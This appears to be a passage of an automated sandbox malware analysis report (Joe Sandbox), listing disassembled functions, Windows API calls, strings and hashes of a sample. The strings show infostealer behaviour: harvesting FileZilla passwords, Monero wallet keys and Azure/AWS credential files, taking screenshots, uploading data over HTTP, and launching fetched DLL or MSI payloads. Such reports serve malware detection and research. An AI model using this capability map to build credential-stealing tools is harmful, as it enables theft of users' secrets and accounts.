                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 34a5fdd603d0de37a6f0d60f73c98e6276724822ca45d491b89ff2e8e76bbcd9
                                • Instruction ID: e17e0947c3ee060045ce8984dcc84a3879a3037545cc708362877e7934b32714
                                • Opcode Fuzzy Hash: 34a5fdd603d0de37a6f0d60f73c98e6276724822ca45d491b89ff2e8e76bbcd9
                                • Instruction Fuzzy Hash: 35D15171910109ABDB04EBF0DDAADEE7B38FF94301F54851AF502A7091EF34AA49CB65
                                Function 00545960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                                  • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005459F8
                                • StrCmpCA.SHLWAPI(?,0107F608), ref: 00545A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00545B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0107F4B8,00000000,?,0107B3C8,00000000,?,00561A1C), ref: 00545E71
                                • lstrlen.KERNEL32(00000000), ref: 00545E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00545E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00545E9A
                                • lstrlen.KERNEL32(00000000), ref: 00545EAF
                                • lstrlen.KERNEL32(00000000), ref: 00545ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00545EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00545F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00545F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00545F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00545FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00545FBD
                                • HttpOpenRequestA.WININET(00000000,0107F498,?,0107EFB8,00000000,00000000,00400100,00000000), ref: 00545BF8
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                • InternetCloseHandle.WININET(00000000), ref: 00545FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 42e736bfe12a6659895fe76f0b88460b283268d393189d1bb47517a3f668d604
                                • Instruction ID: 00887f8f7888e2d8f5a10fb93265b67986a3ffdab9acbff38e90c43174c5f00c
                                • Opcode Fuzzy Hash: 42e736bfe12a6659895fe76f0b88460b283268d393189d1bb47517a3f668d604
                                • Instruction Fuzzy Hash: 1A122172820119ABDB15EBA0DCA9FEEB778BF54701F50429AB50663091EF303A4DCF65
                                Function 0054CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0107B548,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0054D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0054D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 0054D208
                                • lstrcat.KERNEL32(?,00561478), ref: 0054D217
                                • lstrcat.KERNEL32(?,00000000), ref: 0054D22A
                                • lstrcat.KERNEL32(?,0056147C), ref: 0054D239
                                • lstrcat.KERNEL32(?,00000000), ref: 0054D24C
                                • lstrcat.KERNEL32(?,00561480), ref: 0054D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 0054D26E
                                • lstrcat.KERNEL32(?,00561484), ref: 0054D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 0054D290
                                • lstrcat.KERNEL32(?,00561488), ref: 0054D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 0054D2B2
                                • lstrcat.KERNEL32(?,0056148C), ref: 0054D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 0054D2D4
                                • lstrcat.KERNEL32(?,00561490), ref: 0054D2E3
                                  • Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
                                  • Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885
                                • lstrlen.KERNEL32(?), ref: 0054D32A
                                • lstrlen.KERNEL32(?), ref: 0054D339
                                  • Part of subcall function 0055AA70: StrCmpCA.SHLWAPI(01079FC8,0054A7A7,?,0054A7A7,01079FC8), ref: 0055AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 0054D3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: ca9b3373f17934a0462c43d7795d89acb154d906315a0a383db295228ce30d2e
                                • Instruction ID: 122ea038a46f09dfa82513cb3fe35982412978f3acc805ed916bbc278f5bea9f
                                • Opcode Fuzzy Hash: ca9b3373f17934a0462c43d7795d89acb154d906315a0a383db295228ce30d2e
                                • Instruction Fuzzy Hash: A7E15571950109ABDB04EBA0DD69EEE7B78BF54302F104156F507A7091EE38BE09CB76
                                Function 0054C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0107DC90,00000000,?,0056144C,00000000,?,?), ref: 0054CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0054CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0054CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0054CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0054CAD9
                                • StrStrA.SHLWAPI(?,0107DDB0,00560B52), ref: 0054CAF7
                                • StrStrA.SHLWAPI(00000000,0107DD20), ref: 0054CB1E
                                • StrStrA.SHLWAPI(?,0107EB18,00000000,?,00561458,00000000,?,00000000,00000000,?,01079FF8,00000000,?,00561454,00000000,?), ref: 0054CCA2
                                • StrStrA.SHLWAPI(00000000,0107EA98), ref: 0054CCB9
                                  • Part of subcall function 0054C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0054C871
                                  • Part of subcall function 0054C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0054C87C
                                • StrStrA.SHLWAPI(?,0107EA98,00000000,?,0056145C,00000000,?,00000000,01079F98), ref: 0054CD5A
                                • StrStrA.SHLWAPI(00000000,0107A058), ref: 0054CD71
                                  • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B46), ref: 0054C943
                                  • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B47), ref: 0054C957
                                  • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B4E), ref: 0054C978
                                • lstrlen.KERNEL32(00000000), ref: 0054CE44
                                • CloseHandle.KERNEL32(00000000), ref: 0054CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 5496f8909175e12852e21d193a303dafd1ac2b2cf504e781157f9d28633cf008
                                • Instruction ID: 6de9f5c495786812cbf58b1d8ccf706c1d71f7b4460b38e7c5aec9c80ebab801
                                • Opcode Fuzzy Hash: 5496f8909175e12852e21d193a303dafd1ac2b2cf504e781157f9d28633cf008
                                • Instruction Fuzzy Hash: 08E12271D00109ABDB14EBA0DCA9FEE7B78BF94301F50425AF50663191EF346A4ECB65
                                Function 00558320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                • RegOpenKeyExA.ADVAPI32(00000000,0107C480,00000000,00020019,00000000,005605B6), ref: 005583A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
                                • wsprintfA.USER32 ref: 00558459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0055847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0055848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00558499
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
                                • Instruction ID: 4db97ab99808f7c869fc04b5572e0e5550160f43435c2e3f83d23996b033f30c
                                • Opcode Fuzzy Hash: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
                                • Instruction Fuzzy Hash: 65813E7191011CABEB24DB50CC95FEA7BB8FF48701F10869AE509A6180DF746B89CFA5
                                Function 00554D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00554DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00554DCD
                                  • Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
                                  • Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943
                                • lstrcat.KERNEL32(?,00000000), ref: 00554E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00554E59
                                  • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                                  • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                                  • Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                                  • Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00554EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00554EE5
                                  • Part of subcall function 00554910: wsprintfA.USER32 ref: 005549B0
                                  • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,005608D2), ref: 005549C5
                                  • Part of subcall function 00554910: wsprintfA.USER32 ref: 005549E2
                                  • Part of subcall function 00554910: PathMatchSpecA.SHLWAPI(?,?), ref: 00554A1E
                                  • Part of subcall function 00554910: lstrcat.KERNEL32(?,0107F5C8), ref: 00554A4A
                                  • Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FF8), ref: 00554A5C
                                  • Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A70
                                  • Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FFC), ref: 00554A82
                                  • Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A96
                                  • Part of subcall function 00554910: CopyFileA.KERNEL32(?,?,00000001), ref: 00554AAC
                                  • Part of subcall function 00554910: DeleteFileA.KERNEL32(?), ref: 00554B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: f0a865d2e6c1ceac35d2dea99e7f2776623c8552972979af8e65ab8ca622611c
                                • Instruction ID: 1095d2b4ad38d1e1f8165de0a96c3aa665697a5182c1758cc5c76db5c0f9f67b
                                • Opcode Fuzzy Hash: f0a865d2e6c1ceac35d2dea99e7f2776623c8552972979af8e65ab8ca622611c
                                • Instruction Fuzzy Hash: BF41A2BA95020967DB10F760EC5BFED3B38BB64705F004595B589660C1FEB46BCC8BA2
                                Function 00559010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0055906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 6e8f3be0a2c927b0faece115d57adf1fb0814935ee66cb340b0f652a39555fca
                                • Instruction ID: 93335c7fb11d32f14c70677f2e42e07288529cfa08e4425dbb2ee3daccdebc28
                                • Opcode Fuzzy Hash: 6e8f3be0a2c927b0faece115d57adf1fb0814935ee66cb340b0f652a39555fca
                                • Instruction Fuzzy Hash: C4712F71940209EBDB04DFE4DC99FEEBBB8BF88301F108509F515A7290DB38A945CB65
                                Function 00552E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 005531C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 0055335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 005534EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 9c76354a90c07e8aa6f6f5fdd7b9230de9b16b434e2f3fd7194267e923cfbd57
                                • Instruction ID: a302a5010253c0b834bd29173f21d2f69d1744a6aa28ac238cf985029e935c15
                                • Opcode Fuzzy Hash: 9c76354a90c07e8aa6f6f5fdd7b9230de9b16b434e2f3fd7194267e923cfbd57
                                • Instruction Fuzzy Hash: 661212718101199ADB05EBA0DCAAFEEBB78BF54301F50425AF90676191EF342B4ECF52
                                Function 005552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                                  • Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0107F608), ref: 00546303
                                  • Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                                  • Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0107EFB8,00000000,00000000,00400100,00000000), ref: 00546385
                                  • Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
